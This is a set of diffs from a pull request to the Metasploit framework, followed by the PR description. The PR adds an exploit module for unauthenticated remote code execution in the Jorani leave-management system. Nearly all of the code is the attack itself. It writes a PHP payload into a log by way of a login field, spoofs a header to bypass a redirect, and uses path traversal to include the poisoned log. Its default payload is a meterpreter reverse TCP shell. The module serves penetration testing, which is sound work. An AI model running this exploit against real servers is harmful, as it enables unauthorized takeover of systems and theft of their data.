   include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
-    super(update_info(info,
+    super(
+      update_info(
+        info,
                       'Name' => 'Jorani unauthenticated Remote Code Execution',
-                      'Description' => '
-          This module exploits an unauthenticated Remote Code Execution in Jorani.
-          It abuses 3 vulnerability: log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
-          It has been tested on Jorani 1.0.0.
-        ',
+                      'Description' => %q{
+                        This module exploits an unauthenticated Remote Code Execution in Jorani.
+                        It abuses 3 vulnerability: log poisonning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
+                        It has been tested on Jorani 1.0.0.
+                      },
                       'License' => MSF_LICENSE,
                       'Author' =>
                         [
@@ -23,26 +25,26 @@ class MetasploitModule < Msf::Exploit::Remote
                         ],
                       'References' =>
                         [
-                          %w[CVE CVE-2023-26469],
+                          %w[CVE 2023-26469],
                           ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
                         ],
                       'Platform' => %w[php],
                       'Arch' => ARCH_PHP,
                       'Targets' =>
                         [
-                          ['Jorani <= 1.0.0', {}]
+                          ['Jorani < 1.0.2', {}]
                         ],
                       'DefaultOptions' => {
                         'PAYLOAD' => 'php/meterpreter/reverse_tcp',
                         'RPORT' => 443,
                         'SSL' => true
                       },
-                      'DisclosureDate' => 'Jan 06 2023',
+                      'DisclosureDate' => '2023-01-06',
                       'Privileged' => false,
                       'DefaultTarget' => 0,
                       'Notes' =>
                       {
-                        'Stability' => [CRASH_SAFE],
+                        'Stability'   => [CRASH_SAFE],
                         'Reliability' => [REPEATABLE_SESSION],
                         'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
                       })
@@ -90,17 +92,22 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => "#{uri}/session/login"
     )
 
+    if res.nil?
+      print_error('There was a problem accessing the login page')
+      return Exploit::CheckCode::Safe
+    end
+
     return Exploit::CheckCode::Safe unless service_running(res)
 
-    print_good('Jorani seems to be running on the target !')
+    print_good('Jorani seems to be running on the target!')
 
     current_version = get_version(res)
     return Exploit::CheckCode::Detected if current_version.nil?
 
     print_good("Found version: #{current_version}")
-    current_version = Gem::Version.new(current_version)
+    current_version = Rex::Version.new(current_version)
 
-    return Exploit::CheckCode::Vulnerable if current_version <= Gem::Version.new('1.0.0')
+    return Exploit::CheckCode::Appears if current_version <= Rex::Version.new('1.0.0')
 
     Exploit::CheckCode::Safe
   end
@@ -110,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Trying to exploit LFI')
 
     path_trav_payload = '../../application/logs'
-    header_name = (0...14).map { ('A'..'Z').to_a[rand(26)] }.join
+    header_name = Rex::Text.rand_text_alpha_upper(16)
     poison_payload = "<?php if(isset($_SERVER['HTTP_#{header_name}'])){ #{payload.encoded} } ?>"
     log_file_name = "log-#{Time.now.strftime('%Y-%m-%d')}"
 
@@ -122,12 +129,17 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => "#{uri}/session/login"
     )
 
+    if res.nil?
+      print_error('There was a problem accessing the login page')
+      return
+    end
+
     print_status('Recovering CSRF token')
     csrf_tok = recover_csrf(res)
     if csrf_tok != ''
       print_good("CSRF found: #{csrf_tok}")
     else
-      print_status("CSRF not found, doesn't mean its not vulnerable")
+      print_status('CSRF not found, doesn\'t mean its not vulnerable')
     end
     print_status('Poisonning log with payload..')
     print_status('Sending 1st payload')
@@ -136,7 +148,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'keep_cookies' => true,
       'uri' => "#{uri}/session/login",
-      'data' => "csrf_test_jorani=#{csrf_tok}&last_page=session/login&language=#{path_trav_payload}&login=#{Rex::Text.uri_encode(poison_payload)}&CipheredValue=DummyPassword"
+      'data' => "csrf_test_jorani=#{csrf_tok}&"                  \
+                'last_page=session/login&'                       \
+                "language=#{path_trav_payload}&"                 \
+                "login=#{Rex::Text.uri_encode(poison_payload)}&" \
+                "CipheredValue=#{Rex::Text.rand_text_alpha(14)}"
     )
 
     print_status("Including poisonned log file #{log_file_name}.php")
@@ -149,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' =>
       {
         'X-REQUESTED-WITH' => 'XMLHttpRequest',
-        header_name => 'MSFExploit'
+        header_name => Rex::Text.rand_text_alpha(14)
       }
     )
 

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -90,8 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res.nil?
-      print_error('There was a problem accessing the login page')
-      return Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Safe('There was a problem accessing the login page')
     end
 
     return Exploit::CheckCode::Safe unless service_running(res)

--- a/modules/exploits/multi/php/jorani_path_trav.rb
+++ b/modules/exploits/multi/php/jorani_path_trav.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def service_running(res)
     matches = res.body.scan(/Leave Management System/)
     if matches[0].nil?
-      print_error("Jorani doesn't appears to be running on the target")
+      print_error("Jorani doesn't appear to be running on the target")
       return false
     end
     true


### PR DESCRIPTION
This PR add a new exploit module for an unauthenticated RCE.

## Verification

You need to deploy an instance of a vulnerable jorani instance (version <= 1.0.0)

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/php/jorani_path_traversal`
- [ ] `set your options...`
- [ ] `check`
- [ ] `run`


Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
